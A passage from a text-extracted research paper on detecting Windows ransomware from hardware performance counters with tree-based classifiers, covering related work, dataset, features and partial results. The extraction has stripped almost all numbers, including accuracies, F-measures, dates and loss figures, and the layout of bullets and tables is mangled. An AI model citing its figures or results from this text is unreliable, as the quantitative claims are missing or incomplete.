on the classification of microsoft-windows ransomware using hardware profile on the classification of microsoft-windows ransomware using hardware profile sana aurangzeb ,*, rao naveed bin rais ,*, muhammad aleem , muhammad arshad islam and muhammad azhar iqbal department of computer science, national university of modern languages, islamabad, islamabad, ict, pakistan college of engineering and information technology, ajman university, ajman, united arab emirates department of computer science, national university of computer and emerging sciences, islamabad, islamabad, ict, pakistan school of information science and technology (sist), southwest jiaotong university, chengdu, china * these authors contributed equally to this work. abstract due to the expeditious inclination of online services usage, the incidents of ransomware proliferation being reported are on the rise. ransomware is a more hazardous threat than other malware as the victim of ransomware cannot regain access to the hijacked device until some form of compensation is paid. in the literature, several dynamic analysis techniques have been employed for the detection of malware including ransomware; however, to the best of our knowledge, hardware execution profile for ransomware analysis has not been investigated for this purpose, as of today. in this study, we show that the true execution picture obtained via a hardware execution profile is beneficial to identify the obfuscated ransomware too. we evaluate the features obtained from hardware performance counters to classify malicious applications into ransomware and non-ransomware categories using several machine learning algorithms such as random forest, decision tree, gradient boosting, and extreme gradient boosting. the employed data set comprises ransomware and non-ransomware applications, which are collected using the virusshare platform. the results revealed that extracted hardware features play a substantial part in the identification and detection of ransomware with f-measure score of . achieved by random forest and extreme gradient boosting. subjects artificial intelligence, data mining and machine learning, scientific computing and simulation, security and privacy, operating systems keywords malware, ransomware, performance counters, classification, machine learning introduction over the past several years, an exponential increase has been reported in ransomware attacks. ransomware is the sub-class of malware that hijacks a device and blocks the victim to access the data until a compensation of some form is made. typically, this compensation is in the form of money to concede access back to the victim. ransomware has the ability to harmfully affect various kinds of devices such as personal computers, servers, smartphones, tablets, etc. for instance, multiple new variants of ransomware including wannacry, jaff, petya have been reported in (hampton, baig & zeadall, ). how to cite this article aurangzeb s, rais rnb, aleem m, islam ma, iqbal ma. . on the classification of microsoft-windows ransomware using hardware profile. peerj comput. sci. :e doi . /peerj-cs. submitted september accepted december published february corresponding author rao naveed bin rais, r.rais@ajman.ac.ae academic editor yu-dong zhang additional information and declarations can be found on page doi . /peerj-cs. copyright aurangzeb et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:r.�rais@�ajman.�ac.�ae https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ on may , within the span of a few hours, the wannacry ransomware (maurya et al., ) infected more than , desktop devices in over countries across the globe (grant & parkinson, ). the financial loss incurred due to ransomware can be quite devastating. for instance, cryptowall_v ransomware (ali, ; sgandurra et al., ) caused the loss of an estimated $ million in the us from november to june .). in , it was reported that % of the companies paid a ransom to recover the data stored on infected machines, which increased to % in the year (ramesh & menen, ). another ransomware attack, triggered by cryptowall_v ransomware resulted in a loss of $ . million worldwide (ali, ). recently reported ransomware attacks involving notpetya and wannacry are estimated to inflict the costs around $ billion (davies, macfarlane & buchanan, ). these attacks wreaked havoc in systems of various world organizations by halting and damaging their daily operations. it seems that losses caused by ransomware will probably exceed $ billion by the end of the year (shown in fig. ) as reported by the global ransomware-protection report (ramesh & menen, ; chung, ). although, malware is deemed a great threat over the years, yet ransomware is an even more daunting threat compared to other malware due to its attacking and demanding nature (i.e., expecting a ransom in return). the classification of ransomware from traditional malware is essential because of their higher damaging impact in terms of informative data and financial loss. compared to typical malware, it is challenging to identify and kill ransomware even when it is discovered, and the damage can be potentially irreparable even after its deletion al-rimy, maarof & shaid ( ) and zhang et al. ( ). hence, we require proactive and aggressive techniques to handle ransomware. figure estimation and projection of losses (in billions usd) caused by different ransomware between and (ramesh & menen, ; chung, ). full-size doi: . /peerj-cs. /fig- aurangzeb et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ moreover, it is very challenging to recognize and isolate the malware from ransomware due to the similarity in nature. a ransomware is more menacing than malware, as it not only damages the system and results in loss of control from the system but also demands compensation in return. therefore, there is a need to have the proper distinction of ransomware from other malware (aurangzeb et al., ; kok et al., ; zhang et al., ) to save billions of dollars in financial losses (davies, macfarlane & buchanan, ). before analyzing the ransomware, one of the mandatory steps is the accurate identification of a particular type of ransomware and differentiating it from other typical malware. broadly, malware analysis techniques are categorized as ( ) static and ( ) dynamic analysis (chen et al., ). besides, various researchers have employed the combinations of static and dynamic techniques in the form of hybrid analysis techniques. the procedure of scrutinizing a potential malware without executing the program is referred to as static analysis, whereas, the analysis performed via observing the execution behavior of a malware is known as dynamic analysis. most contemporary state-of-the- art dynamic analysis techniques detect and classify ransomware that hides itself using various obfuscation techniques such as packed programs, compressed, or data transformation, indirect addressing, etc. (behera & bhaskari, ). a ransomware employs different hijacking strategies such as behaving like an adware resulting in unwanted advertisements or hiding itself using rootkits to bypass anti-viruses (av) (demme et al., ). a rootkit is a malware that alters the operating system (os) and resides in the system for a prolonged period (aurangzeb et al., ). today, various anti-viruses tackle malware to dampen their caused and expected damages. however, the techniques employed by the anti-viruses are often limited to the prior knowledge (e.g., signatures, etc.) and there is a need to have more comprehensive dynamic analysis that could detect ransomware, employing the obfuscation techniques (demme et al., ), utilizing hardware performance counters. hardware performance counters (hpcs) have been typically used by the programmers to analyze and measure the performance of applications and to identify the execution bottlenecks of a program (beneventi et al., ; kuruvila, kundu & basu, ). initially, hpcs have been employed for investigating the static and dynamic analysis of programs to detect any malicious amendments as mentioned in alam et al. ( ) and malone, zahran & karri ( ). several studies (das et al., ; demme et al., ; singh et al., ; wang et al., ) discuss potential implications of using hpc for application analysis, and the majority of them suggest that hardware execution profile can effectuate the detection of malware (demme et al., ; singh et al., ; wang et al., ; kuruvila, kundu & basu, ). another study (xu et al., ) has utilized the hardware execution profiles to detect malware using machine learning algorithms, as malware changes data structures and control flow, leaving fingerprints on accesses to program memory. in this respect, they proposed a framework for detecting malware from benign applications that uses machine learning to classify malicious behavior of malware based on access patterns of virtual memory. zhou et al. ( ) investigated whether hpcs aurangzeb et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ are useful in differentiating the malware from benign applications. however, the study did not consider malware as ransomware. however, utilizing the hardware performance measurements and the profile of the low-level execution behavior has not been previously studied for the analysis and detection of ransomware applications. we argue that ransomware reveals itself by exhibiting peculiar patterns in hpcs (e.g., through clock cycles, cache misses and hits, branch instructions and misses, retired instructions, etc.). in this article, we present a framework based on dynamic analysis that mainly focuses on the classification of ransomware from non-ransomware. this article contemplates hpcs to detect microsoft windows-based ransomware by analyzing the execution behavior of ransomware. we primarily focus to determine the potential use of hpcs in analyzing and proactively detecting ransomware. moreover, the classification of ransomware from malware is imperative because the damages caused by ransomware drastically ensure the data and monetary loss. to address this concern, we propose a mechanism that utilizes the application execution profile for the classification and detection of ransomware from non-ransomware. for classification, the application’s hardware related performance features are extracted from the data set of malware (consisting of ransomware and non-ransomware). afterward, these features are fed to some well-known machine learning classification models such as decision tree (kohavi, ), random forest (liaw & wiener, ), gradient boosting (friedman, ) and extreme gradient boosting (xgboost) (chen & tong, ). these four classifiers are generally used for classification tasks of various applications including spam detection, face recognition and financial predictions (jordan & mitchell, ; kuruvila, kundu & basu, ), etc. we employ these four classifiers as part of the proposed methodology to analyze their performance for ransomware detection. these models perform binary classification of malicious software into ransomware or non-ransomware classes. in summary, the main contributions of this article are as follows: � in-depth analysis of the current state-of-the-art to identify the merits and demerits of several existing approaches; � a novel mechanism for the classification and detection of malicious applications into ransomware and non-ransomware; and � an empirical investigation of the hpcs against state-of-the-art dynamic techniques using machine learning classifiers; the outcomes revealed that both the random forest and extreme gradient boosting classifier has outperformed decision tree and gradient boosting by attaining accuracy of . for classification. the rest of the article is organized as follows. “related work” describes the related work. “motivation and methodology” presents the proposed methodology, dataset and feature extraction mechanism. in “results and discussion”, the experimental setup details, results and related discussions are presented and “conclusions” concludes the article. aurangzeb et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ related work for dynamic analysis, it is necessary to collect key ransomware features at runtime. most of the dynamic analysis-based research studies exploit the renowned malware databases (www.virusshare.com) for the acquisition of malicious software and use quarantine environments (such as cuckoo’s sandbox (kaur, dhir & singh, )) to execute the applications. in zavarsky & lindskog ( ), the authors presented an experimental analysis of microsoft windows and android-based ransomware. this analysis demonstrates that ransomware detection could be performed by monitoring the abnormalities in the file system and registry activities. it is shown that a significant number of ransomware families exhibit very similar characteristics. moreover, the authors concluded that changes in a particular set of registry keys are important aspects to be analyzed for ransomware detection. the authors discovered that microsoft windows is reasonably effective against ransomware attacks. moreover, this study also revealed that for the android platform, the android manifest file and the permissions (required by an app) should also be considered for ransomware detection. there is a lot of work (alzahrani & alghazzawi, ; victoriano, ) related to android malware detection using machine learning approaches to classify malware families. authors in scalas et al. ( ) focus on ransomware classification and proposed a learning-based detection strategy. the proposed scheme relies on system’s api information such as packages, classes, and methods related traces. the proposed scheme is capable to differentiate and classify generic malware, ransomware, and goodware. the experimental results highlight the significance and effectiveness of using system api information for android ransomware classification. several researchers utilized the hash information (i.e., comparing hash values) to detect the cryptolocker ransomware (song, kim & lee, ). the affected systems are recovered by the following ways: ( ) process cryptolocker, ( ) comparing hash information with the encrypted data files ( ) validating the key using the key-index information stored therein and ( ) proceeding to decode. generally, this type of process consumes a lot of time for ransomware detection with a potential risk that another ransomware appears until a security company comes up with decryption keys of the old ransomware. moreover, additional analysis is needed to detect new patterns of ransomware as the hackers persistently come up with new variants of ransomware. on the android platform, another technique is proposed (song, kim & lee, ) to prevent ransomware intrusion. the technique requires intense monitoring of the execution processes and analysis of the particular file directories using the statistical techniques, such as next-generation intrusion detection expert system (nides) (anderson, thane & alfonso, ) using the processor, memory usage and i/o rates, to uncover the applications exhibiting abnormal behavior (song, kim & lee, ). several other research studies have harnessed the machine learning-based approaches and dynamic or runtime features of executing applications to detect ransomware. recently, hpcs-based events and their features are being used widely in research to detect side-channel attacks and ransomware (or-meir et al., ). alam et al. ( ) have used aurangzeb et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://www.virusshare.com http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ hpcs features to detect malware from benign applications. the authors proposed an anomaly detection technique to identify malicious ransomware in a few seconds with very few false positives using recurrent neural networks (rnn). however, only five hardware performance measures that is, instruction, cache-references, cache-misses, branches and branch-misses are investigated, whereas the authors investigation is with one type of ransomware only, which was wannacry. in kadiyala et al. ( ), only four hardware performance aspects were considered. maiorca et al. ( ) proposed a supervised machine learning-based procedure, r-packdroid, to detect android ransomware, which is a light-weight technique and does not require prior knowledge of ransomware’s encryption mechanisms. however, the r-packdroid technique uses fully encrypted code-files and is unable to analyze the applications that load the code at run-time. the r-packdroid can be incorporated with the other dynamic analysis methods, such as the approach proposed by kimberly et al. ( ). moreover, r-packdroid based application analysis strongly depends on the parsing capabilities of the apktool framework. narudin et al. ( ) has presented a machine learning-based malware analysis approach based on the anomaly detection mechanism. the results indicated that bayes network and random forest classifiers produce accurate results by attaining . % true-positive rate (tpr) as compared to the multi-layer perceptron technique with only . % tpr using the malgenome data set. however, the accuracy of this scheme dropped to % for the latest malware experiments. desktop ransomware can easily bypass any counter-measures and thus results in the seizure of personal data. authors (al-rimy, maarof & shaid, ) presented an effective mechanism for early diagnosis and avoidance of the crypto-ransomware, which is based on machine learning techniques (one-class svm and n-gram technique (zhang, xu & wang, )) and comprises three modules: ( ) pre-processing, ( ) features engineering and ( ) detection module. the authors employed an adaptive anomaly detection mechanism that handles the dynamic characteristics of systems and frequently updates the normal profile built from the feature extraction (al-rimy, maarof & shaid, ) to improve the accuracy of detection. the study (kharraz et al., ) has presented the analysis of ransomware families (the year – ) and concludes that the suspicious activity of file systems should be observed for ransomware detection. for instance, the changes in the types of i/o request packets (irp) or the master file table (mft) are usually formed to access the file system. a considerable number of ransomware families share related features as a core part of the attacks; however, there still lacks a reliable destructive function to successfully infect files of victims. in table , we recapitulate several other prominent ransomware detections (yang et al., ; andronio, zanero & maggi, ; kharraz et al., ) and prevention (ahmadian, shahriari & ghaffarian, ; kim, soh & kim, ; lee, moon & park, ; brewer, ) techniques. recently, deep neural networks and convolutional neural networks (cnns) have shown remarkable performance in the area of object recognition (simonyan & zisserman, ). the deep convolutional neural networks can outperform the other approaches like natural language processing (nlp), aurangzeb et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table comprehensive comparison of the state-of-the-art approaches along with their key points, drawbacks and implementation design approach. references methodology strengths limitations demme et al. ( ) � dynamic approach � android malware detection with performance counters � applied ml algorithms (knn, decision tree) � major support is that runtime behavior can capture using hw performance counters are essential to detect malware % accuracy with % fp � able to detect some variants whereas some were not detected � malware label data might not accurate kharraz et al. ( ) � analyzed ransomware families � proposed various mitigation approaches to decoy resources to detect malicious file access. � provide evolution-based study of rw attacks from a long-term study - � detailed analysis of bitcoin for monetization � assumed that every file system access to delete or encrypt decoy resources � however, they didn’t implement any concrete solution to detect or defend against these attacks kim, soh & kim ( ) � present a quantification model based on social engineering technique to avoid and identify any cryptographic operations in the local drive � explains the file-based intrusion detection system and ip traceback algorithm � lack of experimental results � suggests guidelines online narudin et al. ( ) � machine learning-based study � filter tcp packets, extract network traffic features � evaluate bayes, random forest, knn, j , & mlp � accurate detection based on ml classifiers. � bn and rf produces . % tpr � bayes, mlp with roc . and rf with . � applicable for android platform only zavarsky & lindskog ( ) � the life cycle of windows-based ransomware study. � implement basic static and basic dynamic � md method, cuckoo sandbox used. � for android analyze androidmanifest. xml, administrative privilege � for windows analyze filesystems, registry activities, and network operations � explained the detailed analysis, working, and functionality of ransomware � performed analysis on both the windows and android-based rw � peid tool is used for windows ransomware detection � performed only basic static and dynamic analysis. � no machine learning-based approach to detect zero-day ransomware � lack of experimental analysis song, kim & lee ( ) � proposed techniques on three modules: configuration, monitors, and processes sing � the hash information method is used for detection of cryptolocker type ransomware � the proposed technique monitors the processes and specific file directories � monitor file events using statistical methods on processor usage, memory usage, and i/o rates � not applicable for windows-based ransomware � no classifier is used � does not install applications and execute for prevention and detection � results are not analyzed quantitatively kharraz et al. ( ) � dynamic approach � monitors file system i/o activity � detect screen locking mechanism, � used tesseract-ocr � new ransomware family were detected that was not detected previously � the long-term study analyzed malware samples and correctly detect and verified ransomware samples � . % tp rate and fps � accuracy is not that good. for example, the system correctly detects , ransomware whereas only one unknown was detected (continued) aurangzeb et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table (continued) references methodology strengths limitations sgandurra et al. ( ) � dynamically monitor file system activity on windows platform � classify between goodware and ransomware using ml � mutual information and regularized logistic regression classifier used. � proposed machine learning approach elderan � effective and entirely automated tool to analyze new software and enhance the detection capabilities of av software � registry key and api calls are the two classes with the most relevant features. � elderan achieves roc curve of . , detection rate . % � despite good results, elderan still not be used as a replacement for av � the current settings have no other applications running in the vm, except the ones coming with a fresh installation of windows, � initial dataset was larger � unable to analyze rw that shows silent behavior, or wait for the user to do something chen & robert ( ) � dynamic behavioral analysis of wanna cry � present a method to extract features of malware from hosts logs � tf-idf approach gives better results for analyzing wanna cry � research helps in further manual analysis of logs from ambient system logs in forensic efforts. � automatically generate behavior analysis of malware samples from sandbox log data � presentation and experimented results are outside the scope of the article � study not help in analyzing automatic pattern generation al-rimy, maarof & shaid ( ) � machine learning n-gram, efcm, � information gain, � sliding window � static + dynamic conf � svm for behavioral detection � proposed framework inclines to share the pre-encryption data space as the main defense step against crypto- ransomware attacks � no classification � no experimental work � no results evaluation details bahador, abadi & tajoddin ( ) � presents a two-stage heuristic matching strategy signature-based approach to hardware-level behavioral malware detection and classification � hlmd approach can detect malicious applications at the beginning of the execution and can achieve an average precision, recall, and f-measure of . %, . %, and . %, respectively � their approach is suitable for independent malicious programs (worms, trojans and bots) that can be run standalone without having to be attached to a host program � not applicable for ransomware dion & brohi ( ) � analyzed the opcodes and measures their frequencies. � compare the performance of supervised machine learning algorithms for ransomware classification � experimental analysis of random forest, gradient boosting decision tree (gbdt), neural network using multilayer perceptron and three types of support vector machine (svm) were performed � random forest and gbdt outperformed � authors mentioned that the experimental platform can be able to identify only exe or ddl format ransomware � only supervised machine learning applied kadiyala et al. ( ) � malware analysis using hardware performance counters � proposed a three-step methodology included i) extracting the hpcs ii) finding maximum variance through reducing fine-grained data iii) apply ml algorithms � extract the hpcs for each system call during the runtime of the program using perf libraries along with coresight access libraries that allows to interact directly through apis � detection rate . % � suitable for linux environment � training set is small � monitored only four hardware performance counters � . % false positive aurangzeb et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ if the training is performed using large datasets (liu & liu, ; zhang, zhao & lecun, ). due to the limited dataset, we have employed supervised machine learning algorithms. moreover, the core objective of our proposed scheme is to gauge the effectiveness of the hardware execution profile (i.e., a truly dynamic environment) for the classification of ransomware/non-ransomware. besides, the performance counters exhibit the true application execution behavior and are being employed by the researchers to analyze application performance (mucci et al., ; bahador, abadi & tajoddin, ; demme et al., ). in basu et al. ( ) authors have used hardware performance counters to detect android malware, and in another similar work (bahador, abadi & tajoddin, ) authors have presented a heuristic (using signature-based features and hardware performance counters) to detect and classify malware. their approach is only suitable for malware detection that are invoked as standalone applications and are not dependent on other host applications. in summary, none of the existing dynamic analysis techniques utilizes the important dynamic feature such as hpcs to detect windows platform based malicious applications. although, there are few approaches available that classify a benign application from ransomware, however, to the best of our knowledge no other approach (utilizing hardware performance counters) classified malware into the subclass of ransomware/non-ransomware on the windows platform. malware can employ obfuscation techniques to deceive static analysis based anti-viruses. furthermore, runtime behavior cannot be obfuscated and can be detected using dynamic analysis. we believe this aspect should essentially be exploited and the hardware execution profile should be utilized to execute applications for ransomware detection. based on these facts, we argue that hpcs are useful features that could be utilized for the detection and classification of ransomware. in this study, table (continued) references methodology strengths limitations alam et al. ( ) � dynamic analysis � implement artificial neural network and fast fourier transformation � disk encryption detection module process used � two-step detection framework named as rapper � an accurate, fast, and reliable solution to detect ransomware. � used minimal tracepoints � provide a comprehensive solution to tackle standard benchmark, � disk encryption and regular high � computational processes � hpcs were used to analyze files using perf tool � observe events of hpcs only i.e., instruction, cache-references, cache- misses, branches, and branch-misses � analyze and present all the case studies by giving a comparison with wannacry only � lack of detailed experimental results and accuracies. our approach � dynamic analysis of hardware performance counters � performed classification techniques on windows-based executable files � apply ml algorithm such as rf, decision tree, gradient boosting, extreme gradient boosting � attained f-measure score of . � random forest and extreme gradient boosting outperformed � dataset was initially large but after preprocessing remain small dataset � only supervised machine learning techniques applied aurangzeb et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we employ various machine learning classifiers such as decision tree, random forest, gradient boosting and extreme gradient boosting along with the hpcs to address the following questions: . how different are ransomware from malware at runtime considering machine learning techniques? . which of the hardware performance counters (hpcs) play a vital role in ransomware detection? motivation and methodology the dynamic analysis holds adequate potential to accurately detect the threat of ransomware because an executable program cannot hide its true characteristic. therefore, most of the anti-virus vendors rely on automated dynamic analysis mechanisms to detect new variants of ransomware. most of the antiviruses apply the heuristics combined with the behavior analysis to deduce whether an executable is benign or malware (sgandurra et al., ). a wide range of hpcs that is, clock cycles, cache hits, cache misses, branch instructions, branch misses, retired instructions, etc. are used to observe the behavior of an executing application (chiappetta, savas & yilmaz, ). usually, the symmetric encryption marks the cache-based events while the asymmetric encryptions do have an impact on the instruction and branching events as explained in alam et al. ( ). hpcs have been harnessed by many application developers to identify the computation and memory bottlenecks to improve the performance and reliability of the executing applications (chiappetta, savas & yilmaz, ). in this study, we utilize performance counters for the classification of ransomware. for classification, we train the employed machine learning classifiers to analyze the dynamic behavior of ransomware and non-ransomware malicious programs. moreover, the classification of ransomware from traditional malware is essential due to the intensity of the damage caused in terms of financial loss. unlike traditional malware, it is more troublesome to identify and kill ransomware even when it is discovered, and the damage is irreparable even after its removal al-rimy, maarof & shaid ( ) and zhang et al. ( ). hence, it is very important to recognize and isolate the malware from ransomware due to the similarity in nature. therefore, it is required to devise a formal classification mechanism to discriminate ransomware from other non-ransomware zhang et al. ( ) aurangzeb et al. ( ) and kok et al. ( ) to avoid billions of transactions in the name of ransom. dataset collection for the experimentation, we have obtained randomly selected windows-based malware from virusshare. virusshare repository provides the dataset related to ransomware and many other types of malicious applications of the windows platform (in addition to the other platforms such as android, linux, etc.). it is frequently updated and at presently contains the latest malicious applications contributed by the community (kouliaridis & kambourakis ). due to the diversity, the virusshare platform is aurangzeb et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ very popular in the research community. we collected the dataset from virusshare related to windows-based malicious applications. after static analysis of the downloaded applications, obfuscated applications are eliminated. afterward, each malware is labeled as a non-ransomware or ransomware based on the analysis data provided by many renowned anti-viruses available via virusshare. these labels are further validated with the tags available from virusshare for the sake of confirmation. in this study, benign binary files are not considered because the main aim of the study is to classify between ransomware and other malicious applications. therefore, we consider the malicious applications category trojan (as a non-ransomware sample) due to their similarity in activities with the ransomware (gazet, ). the employed classifiers are trained using the behavioral features for ransomware and non-ransomware with explicit labeling (i.e., ransomware/non-ransomware). furthermore, a disjoint data set is used for training and testing purposes. feature extraction all malware in the data set are executed in a quarantine environment and their data related to hardware performance counters are collected using perf (an instrumentation and performance analysis tool (de melo, ; weaver, ; alam et al., )). to ensure the reliability and accuracy of the results, the mean values of three rounds of experiments are reported. we executed each application three times in a virtual machine (i.e., vmworkstation pro . . build ) for no longer than s with different input parameters to emulate a real interactive environment. after the execution of each malicious application, the virtual machine is reset to its original state using the snapshot feature (to ensure the performance counter trace collected during the previous execution do not intermingle with the current execution). for binary classification problem discussed above, we employ hardware performance counters as features, that is, ( ) task clock, ( ) context switching, ( ) cpu utilized, ( ) cpu migrations, ( ) page faults, ( ) cpu cycles, ( ) cache-misses, ( ) instructions retired, ( ) branches taken, ( ) branch-misses and ( ) execution time, (illustrated in table ) to train the machine learning classifier. we have executed ransomware applications on a pc within a virtual machine and recorded the features (i.e., hardware performance counters, etc.) using perf. the perf library provides the hardware performance counters related values representing the involvement of the several important hardware features of the processor during execution. feature selection plays a significant role in achieving precise training of the employed machine learning models; thereby attaining accurate results with efficient performance and low overhead (li et al., ). a correlation matrix among the employed features is generated to analyze the pattern that leads to the selection of features. two features are considered negatively correlated if a change of one feature inversely impacts the value of the other feature. the features correlation analysis is presented in fig. . if two numerical features are highly correlated, then one of them can be ignored. therefore, we employed a sub-set of those features which are not co-related to reduce the computation overhead during the training process of the machine learning models. figure shows that the cache misses related hardware feature have a low positive aurangzeb et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table features set used in this work for performance evaluation (hpcs). s.no hardware features description task-clock the task-clock shows the amount of time spent on the task (kuznetsova et al., ) cpu utilization cpu-clock is based on the total time spent on the cpu context switching explains how many times the software switched off the cpu from one process/thread to another (kuznetsova et al., ) cpu migration cpu migration describes equality in a workload distribution across all cores. (kuznetsova et al., ) page faults page-faults occur when a program’s virtual content has to be copied to the physical memory (kuznetsova et al., ) instructions per cycle the average number of instructions executed for each clock cycle branch a branch is an instruction in a computer program that can cause a computer to begin executing a different instruction sequence and thus deviate from its default behavior of executing instructions in order branch misses branch misprediction occurs when a processor mispredicts the next instruction to process in branch prediction, which is aimed at speeding up execution. cycles perf-cpu-cycles is a count of cpu cycles that traces to a hardware counter (flater, ) cache misses cache misses is a state of not getting data that is being processed by a component or application that is not found in the cache. total time elapsed it is the total execution time in seconds figure feature set correlation analysis. full-size doi: . /peerj-cs. /fig- aurangzeb et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ correlation with all the other features. on the other hand, the task clock feature has a strong relationship with the context switches, cycles, instructions, branches, and branches misses. the features having higher rank are deemed as potential features for classification than low ranked features as shown in table . in the training phase, hardware features are extracted by executing known malware and non-malware application in containing environment system units as shown in figs. a and b. a total of % of the employed data set is used for training and % is used for testing. we have used k-fold (k = ) cross-validation mechanism and compare the ransomware detection accuracy of different classifiers to make sure that the dataset is used uniformly without any biasness. this results in un-biased training and testing cycles table features rank list. rank score feature . cache misses . taskclock . branches . secondstimeelapsed . instructions . branchmisses . contextswitches . pagefaults . cpu migration . cycles . cpusutilized figure feature extraction workflow for training and testing phases: (a) workflow of the training process, (b) workflow of the testing phase. full-size doi: . /peerj-cs. /fig- aurangzeb et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ producing the results on which we could conclude with confidence. for each cycle of the training/testing, a % testing and % training partition was employed. the goal of supervised machine learning techniques is to find a function that is trained using the employed features such that the error is minimum for the new or unseen data. in the training phase, the classification model is trained using the hpcs as shown in table . the testing or validation methodology is performed after the training of the classifiers. classification model the machine learning classification algorithms namely decision tree, random forest, gradient boosting and extreme gradient boosting are used for classification purposes such as phishing detection, facial recognition and financial predictions (jordan & mitchell, ), etc. we employ these four classifiers as part of the proposed methodology to analyze their performance for ransomware detection. the decision tree is a tree-based classifier, which contains a root, internal nodes, and leaf nodes. the class label is assigned to each leaf node and the decisions are rendered by the internal nodes (tan, steinbach & kumar, ). random forest (rf) classifier is based on a combination of multiple decision tree predictors such that each tree depends on the values of a random vector sampled independently and with the same distribution for all trees in the forest (xuan et al., ). the extreme gradient boosting xgboost and gradient boosting follow the same basic principle however, there are a few differences in their modeling details. specifically, extreme gradient boosting utilizes a more regularized model formalization to control the over-fitting problem that may occur due to linear fitting over noisy data to provide better performance (jbabdi et al., ). for the decision tree and random forest, the maximum tree depth is set as to ensure that under-fitting issues are avoided. to achieve a smoother curve, the bagging technique is applied to the random forest mechanism where each of the trees executes in a parallel way thus making a forest. as each tree is independent, therefore, the whole forest result is taken for the analysis (resulting in a smoother curve) to avoidover- fitting issues, we have evaluated our proposed technique using k-fold (k = ) cross- validation. the first fold is evaluated with the other folds and the second time it executes, it takes the first and second fold to be compared with the rest, this goes on until % of training data is compared against % of the test data. results and discussion for experimentation, we utilize a system with intel core i processor, gbs of memory, and ubuntu . oem as an operating system. for classification, a machine learning tool scikit-learn (pedregosa et al., ; black et al., ), is employed. to evaluate the results, standard evaluation measures that is, precision, recall, and f-measure are calculated to determine the accuracy of each classifier. equations ( )–( ) provide the mathematical description of accuracy, precision, recall, and f-measure, respectively. the terms used in eqs. ( )–( ) are explained as follows: true positive (tp) rate shows the number of predicted positives that are correct, while the false positive (fp) rate refers to the number of predicted positives that are incorrect. similarly, true negative (tn) rate aurangzeb et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ shows the number of predicted negatives that are correct while the false negative (fn) rate refers to the number of predicted negatives that are incorrect. the recall is the sensitivity for the most relevant result. f-measure is the value that estimates the entire system performance by calculating the harmonic mean of precision and recall. the maximum value of . for accuracy precision and recall indicates the best result (narudin et al., ). accuracy ¼ tp þ tn tp þ tn þ fp þ fn ( ) precision denotes the proportion of predicted positive cases that are correctly real positives. precision ¼ tp tp þ fp ( ) the recall is the proportion of real positive cases that are predicted positive recall ¼ tp tp þ fn ( ) f‐measure ¼ � ðprecision � recallÞðprecision þ recallÞ ( ) receiver operating characteristic (roc) curves (metz, ; dion & brohi, ) are extensively being applied in significant researches to measure the accuracy of the machine learning models that are being trained to achieve actual performance (bradley, ). furthermore, roc curves are applied in numerous systematic approaches that merge multiple clues, test results, etc., and are plotted and evaluated to characterize a qualitative feature of the particular. roc is a plot wherein y-axis is reserved for true positive rate (tpr) and x-axis is reserved for false positive rate (fpr). for all possible classifications such as the output class, the tpr rate depends on the set-up where the real classification is considered to be as positive and the number of times the classifier has predicted the result to be as positive. the fpr can be defined as how the classifier incorrectly labeled positive to those that are classified to be negative. together the tpr and fpr values lie in-between and ( indicating an accurate prediction). the results based on the decision tree classifier can be seen in fig. . the roc curve for both classes (i.e., ransomware as class “ ” and non-ransomware as class “ ”) is the same having value of . which signifies the excellent prediction. however, the precision-recall curve for class that is, for non-ransomware shows accuracy of . or % whereas for class that is, ransomware the accuracy is . . the f-measure score of the decision tree is . as shown in table . the results obtained using the random forest classifier for two classes (i.e., ransomware and non-ransomware) are shown in fig. and f-measure score is illustrated in table . the higher accuracy results are evident from the similar roc curve value that is, . for both the ransomware and non-ransomware classes. aurangzeb et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure decision-tree performance metrics behavior, (a) roc curves for the classes and , (b) precision-recall curve for the classes and . full-size doi: . /peerj-cs. /fig- table decision tree precision, recall and f-measure score for malware classes ( , ). malware class precision recall f-measure ransomware (class label ) . . . non-ransomware (class label ) . . . figure random forest performance metrics behavior, (a) roc curves for the classes and , (b) precision-recall curves for the classes and . full-size doi: . /peerj-cs. /fig- table random forest precision recall and f-measure score against classes and . malware class precision recall f-measure ransomware (class label ) . . . non-ransomware (class label ) . . . aurangzeb et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the results depicting the performance of gradient boosting, shown in fig. , reveal that the roc curve values for both the classes (i.e., ransomware and non-ransomware) as well as (i.e., . ) the precision-recall curves of both classes follow similar pattern of high accuracy. the f-measure score of the gradient boosting classifier is . for ransomware and . for non-ransomware (as shown in table ). the extreme 